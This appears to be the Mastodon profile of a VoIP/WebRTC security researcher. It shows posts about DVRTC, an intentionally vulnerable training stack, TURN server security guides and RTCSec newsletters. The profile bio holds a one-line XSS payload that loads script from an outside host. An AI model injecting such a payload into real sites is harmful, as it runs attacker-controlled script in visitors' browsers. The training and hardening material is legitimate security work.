Sandro Gauci

@sandrogauci
mostly harmless
"'><script/src=//x-x.cc>
Enable Security: https://infosec.exchange/@enablesecurity

RE: https://infosec.exchange/@enablesecurity/116300709031150946

VoIP/WebRTC security has needed a DVWA equivalent for a long time. We built DVRTC: full dockerized VoIP stack, intentionally vulnerable, 7 guided exercises.

Live instance at pbx1.dvrtc.net — try it now.

https://www.enablesecurity.com/blog/introducing-dvrtc-damn-vulnerable-real-time-communications/

#infosec #webrtc #voipsecurity #penetrationtesting #training

RE: https://infosec.exchange/@enablesecurity/116130697375709804

Published the "how to fix it" companion to our TURN security threats post. Best practices guide + coturn config templates at three security levels.

Also discussing TURN security on WebRTC Live today: https://webrtc.ventures/webrtc-live/

https://www.enablesecurity.com/blog/turn-security-best-practices/
https://www.enablesecurity.com/blog/coturn-security-configuration-guide/

#infosec #webrtc #security #TURN #coturn #voip

@fredposner thanks !

RE: https://infosec.exchange/@enablesecurity/116057294204565643

Wrote up our RTCon 2025 talk on TURN security threats. TURN servers are basically open proxies with extra steps. At DEF CON someone showed C2 over Zoom's TURN infra.

https://www.enablesecurity.com/blog/turn-server-security-threats/
#infosec #webrtc #security #TURN #penetrationtesting #voip

@fredposner @enablesecurity this one is a long one!
Monthly reminder that there are those who read what @sandrogauci / @enablesecurity writes, and those who wish they had. #security #rtc #voip
https://www.enablesecurity.com/newsletter/2025-10-rtcsec-news/
October 2025: RTP attacks, Cisco VoIP phones, satellite leaks, and nation-state breaches

October 2025 RTCSec newsletter: RTP Bleed and Inject discussions, critical Cisco VoIP phone vulnerabilities, satellite communication leaks, Ribbon Communications breach, and comprehensive security updates

@fredposner @sandrogauci Thanks for the post! This one covers:

FreePBX troubles and fixes (CVE-2025-57819 + more)
Voice-AI meets toll fraud 📞💸
RTP Bleed clarifications for DTLS-SRTP
TURN security deep-dive
+ Qualcomm & Chrome WebRTC vulns

https://www.enablesecurity.com/newsletter/2025-09-rtcsec-news/

September 2025: more RTP, FreePBX and Voice AI vulnerabilities this time

September 2025 RTCSec newsletter: more RTP, FreePBX and Voice AI vulnerabilities this time

End of the month which means it's time for me to link the @enablesecurity newsletter and say...

"There are those who read what @sandrogauci writes... and those who wish they had."

https://www.enablesecurity.com/newsletter/2025-09-rtcsec-news/


Last time for 2024...

There are those who read what @sandrogauci / @enablesecurity write, and those who wish they had.

https://www.enablesecurity.com/newsletter/2024-12-rtcsec-news/

#voip #webrtc

December 2024: Wrap-Up & Latest VoIP and WebRTC Security News

December 2024 RTCSec newsletter: Year-end review of VoIP & WebRTC security, featuring major breaches, vulnerability reports, and key achievements in RTC security.

November 2024: Breaking VoIP & WebRTC – Exploits, Vulnerabilities, and Shodan Insights

November 2024 RTCSec newsletter: Uncover critical VoIP and WebRTC security insights, including Messenger exploits, vulnerabilities in Cisco phones and video codecs, and Shodan-revealed threats.